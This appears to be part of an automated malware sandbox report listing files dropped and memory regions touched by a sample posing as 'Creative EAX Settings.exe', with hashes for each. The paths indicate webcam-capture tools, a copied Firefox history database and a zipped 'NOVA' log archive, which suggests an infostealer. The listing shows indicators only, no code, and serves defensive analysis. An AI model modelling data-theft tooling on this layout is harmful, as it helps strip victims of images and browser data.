| SHA1 | 3ceba61e9c2975466b6244188f5ea72aaf042fc7 |
| SHA256 | 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840 |
| SHA512 | 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a |
C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\elevate.exe
| MD5 | 792b92c8ad13c46f27c7ced0810694df |
| SHA1 | d8d449b92de20a57df722df46435ba4553ecc802 |
| SHA256 | 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37 |
| SHA512 | 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40 |
C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\app.asar
| MD5 | 46412670f90757a39c2425628ca7308b |
| SHA1 | 9867281235a1f815d92627a70ea3e9085d1bb79f |
| SHA256 | 52f4a7e4b2b87fa0ebd019ad24b83b1ef35eeae250cc8f18e50ca469bfa7d3cf |
| SHA512 | 9427e9d8315c34ca1e7e79ad31831fb5cf6e47aeb313ed660daaaeb97c54a8da36068e0a4988f956f2d598d88f80a6fafd21a06039eb621365b8606eded1720e |
C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json
| MD5 | 067e233b0609d56ff4756bedd8c0efe0 |
| SHA1 | 96419d05adc4b6674948b4ac14f8ab5bb3ce4380 |
| SHA256 | 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74 |
| SHA512 | 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159 |
C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll
| MD5 | c20c205c6f8d70a5e1351a4041a3ec9f |
| SHA1 | e1b2a763dd6c42439656e4e55aba0f3610ff3784 |
| SHA256 | bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc |
| SHA512 | dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1 |
C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe
| MD5 | 16a12bdc986207390dd79d658a6b2263 |
| SHA1 | b4b41f62cbc1e1ede786c6e30e11df8e61750bad |
| SHA256 | 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac |
| SHA512 | d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9 |
C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\swiftshader\libEGL.dll
| MD5 | 19dc9ee70e7765bb63a66b6826e8ecb7 |
| SHA1 | 1a12f983f8b35cc2955d30657971f113c47dc164 |
| SHA256 | 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f |
| SHA512 | 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68 |
C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe
| MD5 | 471b15abc9f2e98fb7ed7361d3f045eb |
| SHA1 | 95b5798d80a9410872f6ed485ae2b43ca3745540 |
| SHA256 | 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004 |
| SHA512 | 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a |
C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\swiftshader\libGLESv2.dll
| MD5 | c0b36d56d83e601bf246f7709a8c5f9d |
| SHA1 | b025a6070f7d61c7d1827856d2d4043834fd23f2 |
| SHA256 | 45bb5e1f8dd87129ac0a75c78f8f29d06e3ac182a00fc5199b692068f1e05a53 |
| SHA512 | e429ae63bd8a7d5a936a638783511693e8fbbc91d97779b3d4dd3f0880f1c8a820106bfb57cf7ee6b3639f19165de87bbe127aadd81218689fc6c8fada2106d1 |
C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\StdUtils.dll
| MD5 | c6a6e03f77c313b267498515488c5740 |
| SHA1 | 3d49fc2784b9450962ed6b82b46e9c3c957d7c15 |
| SHA256 | b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e |
| SHA512 | 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803 |
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
| MD5 | aa687c4a52fe7c51f02a773afdee3984 |
| SHA1 | 8a1a74e57086e099e00758aa06260f3c31aea698 |
| SHA256 | 5a723f275627664caaf827e3a2587febf33de532013749207cd7af1ca24d965a |
| SHA512 | cbeef908f2190453e20ee0826b6ef5f3ca054a7b3ac72b8a7e3323d496dc362d0c8632a14aa8ad385488aa76247ca0c3d9763319e32e73b9e198487371f79243 |
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
| MD5 | 15c0e0040c328569bdf818a1820515c8 |
| SHA1 | 59ba821ee81c4fe00162e328a252c3d135cbd4fe |
| SHA256 | d47e9d972092df09ff86aa6d25d86f6ddae6f806bd7f90062e5f5cc1429abb82 |
| SHA512 | a22f833ec2be93cc83b1338edc7966b5fa19d4dfac629fa3692b2f14042474d4116c2c83c3dce99c58c3ef7f90ba3e10fbbc57c02f29caac367a19c96b4fca89 |
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\icudtl.dat
| MD5 | a7d6ec3c81a4d76293eab4dd425074d6 |
| SHA1 | 527a7ce5f97e976fc0336f9938d0180fe12c7015 |
| SHA256 | 52c74fe5faa8646b5f652714352c67d5a6ddc3dcf6ccdc108d00a98c5348fbbd |
| SHA512 | 517d0b40d2b993ea39c330f5f408edd4b73b1628c75593fb7d1137e61f2c3d8e349964c13ca77af8612226962defd9779a2305128d4802656a3815b5a860aca3 |
memory/2660-3464-0x0000000000CC0000-0x0000000000D26000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\resources\app.asar
| MD5 | fc3c5d2df0982333e7df9ad65f670f18 |
| SHA1 | beec1cb099a3b9fee45df0c3a1ff6e80bef57cc8 |
| SHA256 | 7f946fe8104792a12393a3aafd63f301daa06f2dda0498ac8b7a6a8cd905f24c |
| SHA512 | df5e55b839467b7e410dbf3b002c6dec5a75e0a32f08520e490dd2741bcb3ab5858db5d72c45e0d65349cd84ab8e98ca38d7294320860638a77f657a163db353 |
C:\Users\Admin\AppData\Local\Temp\d9602bfe-dea5-41f1-bbf4-2ab9417e4c39.tmp.node
| MD5 | 3072b68e3c226aff39e6782d025f25a8 |
| SHA1 | cf559196d74fa490ac8ce192db222c9f5c5a006a |
| SHA256 | 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01 |
| SHA512 | 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61 |
C:\Users\Admin\AppData\Local\Temp\eb59fd39-768b-470d-85d1-4e5499a49cc6.tmp.node
| MD5 | d973217f06f98190161a84a2d2a969ab |
| SHA1 | 1647ee43e1d90dcdd56b5b5ee627f5b0d28dadce |
| SHA256 | ba798e6f8036e7c3e874588f3f939d16e4121c72aa4e7acd15667112774413e1 |
| SHA512 | 69b970858aaffd368b3174649c329539df65daf5fd8cad8e3d5f579fa253eae0dcd6e56f870884757d271f99ab922fe328f7d95a08d6c6ba6092beabae4220b1 |
memory/2188-3483-0x00007FFB68CE0000-0x00007FFB68CE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
| MD5 | b3841300e6fee8d60474cdef9d0c69ec |
| SHA1 | 05428dcf26397a584080f37665e692435e56c63f |
| SHA256 | a018d53ad4ae177286b0415ba0c243484f75effa74f3fc9dfd6eb1e8f98dadb2 |
| SHA512 | 064bacdc43b9c46e26784586c689b82ad8943a67bf517222112798bf013eb29599d987e158a945096f6c471123d3ac67d5363103a9c1e1172377ec5504283b1a |
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\libGLESv2.dll
| MD5 | 7eda02f572ed773a95e95c1faefab6d2 |
| SHA1 | 7b709ff45ec0261888dcdc8448ac32da52f1d5b3 |
| SHA256 | 00936f7be3f21f452e8b17bcb923a31eeb0495d6ab91b602a489530ecbccf8bb |
| SHA512 | 179211d7badffcb3abde8386f5e8636aa92c174269562a78c3b031577f6c2cb8736d68feac3c69de43deddb49e60fb26fd324989b0987db466fa09d804a41eba |
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\libglesv2.dll
| MD5 | 83fad7420f60f58e3e4f51299f3fd9d9 |
| SHA1 | 6dc31980627f584e96a1238ab3fdce15456c48d2 |
| SHA256 | 4fab5a91ef0caf067513d5f511e11f9c9da113164933ae0b8288d3f3c763058f |
| SHA512 | 380b0823b2c7239750a2cca7f9780d83599dee4effee7fec4b11afbb5226d31bb76785b22f1bcc460c4058244daaf37ed370f283e7552cf020720c5960bedc64 |
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\d3dcompiler_47.dll
| MD5 | 00460c2cfd7459068ad5d1b6a5142cc7 |
| SHA1 | 87b74b6b6ef9e1c1b2623a44977b6c9b7b4a17b3 |
| SHA256 | 71c9ce833e589c3ec57683867387e8685a003290ef4e3898419d2a3da7dbf819 |
| SHA512 | 05c4c783c72db44ff094d1e6f6fd5300f9caf9da7644bf4a38790bf94a8589eaacf53fb6007f137186c889a3b392fdecfc6a44d5b282576b2928591164993235 |
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\D3DCompiler_47.dll
| MD5 | 7d80738060984d160fbf47fc59143ad4 |
| SHA1 | 2843e76cd63b230baafaab48370566f5e5bb7b38 |
| SHA256 | 75a24a4a143b1d97797bc98d1da57096d76560cd5594ea43fd8e1e00455304fd |
| SHA512 | d2e51232161464c1aa340a9a92800001b146c6988df90a56e99da7718eefa5a57955fa0fd3f5f99a71b42562504e7f7fbd5a16e501f5d6fd5d830e9468bcea59 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lpm42pod.hho.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1540-3512-0x000001F4E0C60000-0x000001F4E0C82000-memory.dmp
memory/1540-3513-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp
memory/1540-3514-0x000001F4E0CB0000-0x000001F4E0CC0000-memory.dmp
memory/1540-3515-0x000001F4E0CB0000-0x000001F4E0CC0000-memory.dmp
memory/1540-3519-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp
memory/5024-3521-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp
memory/5024-3531-0x000002660A7C0000-0x000002660A7D0000-memory.dmp
memory/5024-3532-0x000002660A7C0000-0x000002660A7D0000-memory.dmp
memory/5024-3535-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MCI3NK51VL9ERPFZJBYH.temp
| MD5 | 52cd9373b8a6f271b65f81fb02d3c329 |
| SHA1 | 93d374e3cf8f578bee3e531f050fc698e66be12d |
| SHA256 | 288da010db6a60da36a26ed01da5d9cc7ba174f888d305dff08362afe42801c7 |
| SHA512 | 89bab2a31fc6525f92ef6f51350235179293b3f8473e7e2aa9a035988fbb40a697a6c104cd6d457ac6fa68e488a7a2068f85a034b14f57e95f9546c93a018c20 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2a7824481b8742991fbe9e89f1a226f6 |
| SHA1 | 89f28cd20e3f5cfce0c2fe51db55857f4f398399 |
| SHA256 | 9f339e7e82ae4b1b89436879a00eb9789697c677b38b0f73a0edb5ef8c6fc4a3 |
| SHA512 | db6ce6131c67e0380ef48e187d9c5d3604798b4849ddae9c98d2cce3abad6b5fcfb5d2078fc7a863268fd712a092f9159b3fc8bf1559668f6787822259e3bdc6 |
memory/2212-3599-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp
memory/2212-3600-0x000002AE75C20000-0x000002AE75C30000-memory.dmp
memory/1480-3601-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp
memory/4496-3611-0x000001FED2960000-0x000001FED2970000-memory.dmp
memory/4496-3612-0x000001FED2960000-0x000001FED2970000-memory.dmp
memory/1480-3613-0x00000270FBF10000-0x00000270FBF20000-memory.dmp
memory/1480-3614-0x00000270FBF10000-0x00000270FBF20000-memory.dmp
memory/5344-3629-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp
memory/5344-3643-0x000001AD69B00000-0x000001AD69B10000-memory.dmp
memory/5344-3644-0x000001AD69B00000-0x000001AD69B10000-memory.dmp
memory/3300-3645-0x000001B872600000-0x000001B872610000-memory.dmp
memory/2212-3646-0x000002AE75C20000-0x000002AE75C30000-memory.dmp
memory/4496-3656-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp
memory/3300-3657-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp
memory/3300-3658-0x000001B872600000-0x000001B872610000-memory.dmp
memory/3300-3659-0x000001B872600000-0x000001B872610000-memory.dmp
memory/1480-3660-0x00000270FBF10000-0x00000270FBF20000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\places.sqlite_tmp
| MD5 | cd53674b12c748b469fdc3361a0362d3 |
| SHA1 | 2f1daf22da5620bb58cbc68129edec6c25d2a377 |
| SHA256 | 107ab1113e010ef09c47b397f82969c9c8caf295938ab4c2c531d2ec28ce6b5f |
| SHA512 | a7d7b1b9d3a0e7289b184ab27f6212da5e7a65880375bb54a259def0c67a280bb893ec1ea4f3d00adaaa1c37165e67074a83d5e3246c39fda6f84650ac70bcd3 |
C:\Users\Admin\AppData\Local\Temp\33sN7DhO25fCsoJ0peG9\Logs\Error.nova
| MD5 | b697b37356ccd3fc63115453ac834bcf |
| SHA1 | a628e8206d906249e51dc583ea32f4da7c872e40 |
| SHA256 | a9d0f86c4b62e910cc5ad830055d3d746664d1ece19b7b72e40da416184cda31 |
| SHA512 | 83f8d1ab260632ea54b5c38ac763ba08d47fad52a9db02ea8b7e9f9c0d98f2bda9647c3f9bc07c7743889cb7df11c6f922e8f28ae207eeb1599ed1b98bad0c34 |
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin.zip
| MD5 | b7e9385ab2ebc33bc7fcb88bc575e81c |
| SHA1 | 795909718c6a51306b6e2639e0548142cab11f31 |
| SHA256 | 03bfc372cf4fa3865a76f7e054527b4264218bb94c3599ea7f5dec274103e7b7 |
| SHA512 | 02606f4c5593cf766ef42076fbd01573b7201cbd00b8acaa2df14d078f5436ba1f06e8ea0ec728ab26cffb4f19c1458539f5d3da9729ebb899dcf64983480590 |
C:\Users\Admin\AppData\Local\Temp\ywsulwhqfl.gif
| MD5 | 2c49243806beec50ad95774f41e42a49 |
| SHA1 | 4755e071b958fcb26b95e8126711b5048087468a |
| SHA256 | 09831198f544822ae270fc943c24ab889f48fac3782460b4e2975ada0410eb54 |
| SHA512 | c41f3ab3afc8e61b28a4612c6e573023bfc85fc45ec182b5ce130cd632a36bd0a6c8d628e4eecc6393447b1976c9bcf10becb0d5bcc7afc822f582cff662b491 |
memory/4160-3867-0x00000154C9090000-0x00000154C9091000-memory.dmp
memory/4160-3868-0x00000154C9090000-0x00000154C9091000-memory.dmp
memory/4160-3869-0x00000154C9090000-0x00000154C9091000-memory.dmp
memory/4160-3878-0x00000154C9090000-0x00000154C9091000-memory.dmp
memory/4160-3879-0x00000154C9090000-0x00000154C9091000-memory.dmp
memory/4160-3880-0x00000154C9090000-0x00000154C9091000-memory.dmp
memory/4160-3881-0x00000154C9090000-0x00000154C9091000-memory.dmp
memory/4160-3882-0x00000154C9090000-0x00000154C9091000-memory.dmp
memory/4160-3888-0x00000154C9090000-0x00000154C9091000-memory.dmp
memory/4160-3889-0x00000154C9090000-0x00000154C9091000-memory.dmp